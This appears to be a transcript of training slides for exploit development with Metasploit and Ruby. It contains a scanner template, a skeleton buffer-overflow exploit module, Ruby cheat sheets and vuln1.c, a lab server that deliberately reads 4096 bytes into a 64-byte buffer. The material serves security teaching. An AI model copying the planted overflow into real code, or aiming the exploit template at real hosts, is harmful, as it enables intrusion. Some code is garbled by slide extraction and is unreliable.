  • 31. maniac_scanner.rb 2007-09-04 require 'msf/core' module Msf class Auxiliary::Scanner::ExampleScanner < Msf::Auxiliary # Exploit mixins should be added first include Exploit::Remote::Tcp # Scanner mixin should be included last include Auxiliary::Scanner def initialize super( 'Name' => 'Generic Scanner Template', 'Author' => 'Maniac <>', 'Description' => %q{ Connect to every host specified in the RHOSTS network range, send a probe, read a response, and print that response to the screen. } ) register_options( [ # Specify the predefined RPORT option Opt::RPORT(25), # Specify a new option containing the string to send to the server;SENDSTRINGquot;, [ false, quot;The string to sendquot;, quot;HEAD / HTTP/1.0nnquot; ]) ], self.class ) end # Work with a single IP address at a time def run_host(ip) # Call the connect() method provided by the TCP mixin # This is equivalent to connect() connect - 1/2 -
  • 32. maniac_scanner.rb 2007-09-04 sock.put(datastore['SENDSTRING']) data = sock.get_once print_status(ip + quot; Received: quot; + data) # Call the disconnect() method provided by the TCP mixin # This is equivalent to disconnect() disconnect end end end - 2/2 -
  • 33. 2007-09-05 #!/usr/bin/env ruby ##### Example TCP Server Lab ##### # In this lab you will be modifying the # code to return any input to the client. require 'socket' # Lets define the port and host. port = 44455 host = localhost # Create a new server connection. server =,port) # Lets stay active as long as we are # accepting connections. while(session = server.accept) # As long as we do not terminate # our client, lets stay within this # context. while !session.eof? # Something should go here ;) end end - 1/1 -
  • 34. example.rb 2007-09-04 require 'msf/core' module Msf class Exploits::Linux::Example < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Example Buffer Overflow Exploit', 'Description' => %q{ }, 'Author' => [ 'Maniac' ], 'Arch' => ARCH_X86, 'License' => MSF_LICENSE, 'Version' => '$Revision: 4961 $', 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 200, 'StackAdjustment' => -3500, }, 'Platform' => 'linux', 'Targets' => [ [ 'linux', { 'Ret' => 0xbfbfec80 } ], ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(5432), ], self.class) end - 1/2 -
  • 35. example.rb 2007-09-04 def exploit connect buf = pattern_create(2000) sock.put(buf) handler disconnect end end end - 2/2 -
  • 36. Predefined Variables Ruby arguments $! Exception information -c Check $@ Array of backtrace -d Debug $& String of last match -e One Line $` String left of last match -h Help $‘ Str right of last match -n gets loop Types Expressions Variables $+ Last group of last match -rL require L 12345 if expr [then] local $N Nth group of last match -v verbose elsif expr 123.45 @instance $~ Info about last match -w warnings [then] 1.23e-4 @@class $= Case insensitive flag -y comp debug else end 0xFF00 CONSTANT $/ Input record separator unless expr 0b01100 $ Output record separator Reserved Words [then] Operators and 1..5 $, Output field separator else alias Precedence end 1...5 $. Line number of last file and :: expr if expr ‚a‘..‘z‘ $> Default output BEGIN [] expr unless ‚a‘...‘z‘ $_ Last input line of string begin expr ** ‚string sq‘ $* Command line args break case expr +-!~ „string dq“ $0 Name of script when comp case */% else „#{expr}“ $$ Process number class end << >> „trn“ $“ Module names loaded def while expr [do] & %q(string sq) $stderr Standard error output end defined? |^ %Q(string dq) $stdin Standard input until expr [do] do > >= < <= end %(string dq) $stdout Standard output else <=> == === != do <<id string id elsif =~ while expr :symbol Regex END && do /regex/opt . all characters until expr end .. ... %r|regex| [] any single char in set for var in expr ensure = ( += -= ) [do] [1, 2, 3] [^ ] any single char not in set false not end %w(1 2 3) * zero or more for and or expr.each [do] %W(1 2 #{expr}) + one or more end if {1=>2, :s=>‘v‘} ? zero or one break next redo in Constants retry | alteration module __FILE__ Exceptions () Group next __LINE__ begin Module/Class ^ Beginning of line or str nil ENV rescue ex => module Name $ End of line or string not var ARGF end else {1,5} 1 to 5 or ARGV class Name ensure A Beginning of a string redo end end b Word boundary rescue class Name < StandardError Sup B Non-word boundary retry ZeroDivisi- end onError d digit, same as [0..9] return class << obj RangeError D Non-digit self end SecurityError s Whitespace super def IOError S Non-whitespace name(args...) then end IndexError w Word-character true def inst. RuntimeError W Non-word-character undef name(...) z End of a string end unless Z End of string, before nl public until protected when private while attr_reader attr_writer yield attr attr_accessor alias new old © 2006 — available free from
  • 37. Object Array File Obj#class -> class Array::new (int [,obj]) -> array File#new (path, modestring)-> file Obj#freeze -> object Array#clear File#new (path, modestring) do |file| ... end Obj#frozen? -> true or false Array#map! do |x| ... end File#open (path, modestring) do Obj#inspect -> string Array#delete (value) -> obj or nil |file| ... end Obj#is_a? (class) -> true or false Array#delete_at (index)-> obj or n File#exist? (path) -> t or f Obj#methods -> array Array#delete_if do |x| ... end File#basename (path [,suffix]) -> Obj#respond_to? (sym) -> true or Array#each do |x| ... end string false Array#flatten! -> array File#delete (path, ...) Obj#to_s -> string Array#include? (value) -> t or f File#rename (old, new) Array#insert (idx, obj...)-> array File#size (path) -> integer String Array#join ([string]) -> string r Read-only, from beginning Str#[num, num/range/regx] -> str Array#length -> integer r+ Read-write, from beginning Str#capitalize! -> string Array#pop -> obj or nil w Write-only, trunc. / new Str#center (int [,str]) -> str Array#push (obj...) -> array w+ Read-write, trunc. / new Str#chomp! ([str]) -> str a Write-only, from end / new Str#count -> integer a+ Read-write, from end / new Hash Str#delete! ([string]) -> string b Binary (Windows only) Hash#clear Str#downcase! -> string Hash#delete (key) -> obj or nil Str#each ([str]) do |str| ... end Hash#delete_if do |k, v| ... end Dir Str#each_line do |line| ... end Hash#each do |k, v| ... end Dir[string] -> array Str#gsub! (rgx) do |match| ... end Hash#has_key? (k) -> true or false Dir::chdir ([string]) Str#include? (str) -> true / false Hash#has_value? (v) -> t or f Dir::delete (string) Str#index (str/reg [,off]) -> int Hash#index (value) -> key Dir::entries (string) -> array Str#insert (int, string) -> string Hash#keys -> array Dir::foreach (string) do |file| Str#length -> integer ... end Hash#length -> integer Str#ljust (int [,padstr]) -> str Dir::getwd -> string Hash#select do |k, v| ... end -> Str#rindex (str/reg [,off]) -> int array Dir::mkdir (string) Str#rjust (int [,padstr]) -> str Hash#values -> array Dir::new (string) Str#scan (rgx) do |match| ... end Dir::open (string) do |dir| .. end Str#split (string) -> array Dir#close Test::Unit Str#strip! -> string Dir#pos -> integer assert (boolean [,msg]) Str#sub! (rgx) do |match| ... end Dir#read -> string or nil assert_block (message) do ... end Str#swapcase! -> string Dir#rewind assert_equal (expected, actual [,msg]) Str#to_sym -> symbol assert_in_delta (exp, act, dlt Str#tr! (string, string) -> string DateTime [,message]) Str#upcase! -> string DateTime::now assert_kind_of (klass, object DateTime::parse (str) [,msg]) Kernel DateTime::strptime (str, format) assert_match (pattern, string [,msg]) block_given? DateTime#day assert_nil (object [,msg]) eval (str [,binding]) DateTime#hour assert_no_match (pattern, string raise (exception [,string]) DateTime#leap? [,msg]) fork do ... end => fixnum or nil DateTime#min assert_not_equal (expected, actual proc do ... end => proc DateTime#month [,msg]) print (obj) DateTime#sec assert_not_nil (object [,msg]) warn (msg) DateTime#wday assert_not_same (expected, actual [,msg]) DateTime#year assert_respond_to(obj, method [,msg]) assert_same (expected, actual [,msg]) Ruby: Doc: © 2006 — available free from
  • 38. vuln1.c 2007-09-04 #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define LISTEN_PORT 5432 int main() { char buf[64]; int sock; int peersock; struct sockaddr_in my_addr; int reuse = 1; if((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror(quot;socketquot;); return(1); } if(setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)) == -1) { perror(quot;setsockoptquot;); return(1); } memset(&my_addr, 0, sizeof(my_addr)); my_addr.sin_family = AF_INET; my_addr.sin_port = htons(LISTEN_PORT); if(bind(sock, (struct sockaddr *)&my_addr, sizeof(my_addr)) == -1) { perror(quot;bindquot;); return(1); } if(listen(sock, 5) == -1) { perror(quot;listenquot;); return(1); } if((peersock = accept(sock, NULL, 0)) == -1) { perror(quot;acceptquot;); return(1); } - 1/2 -
  • 39. vuln1.c 2007-09-04 if(read(peersock, buf, 4096) == -1) { perror(quot;readquot;); return(1); } return(0); } - 2/2 -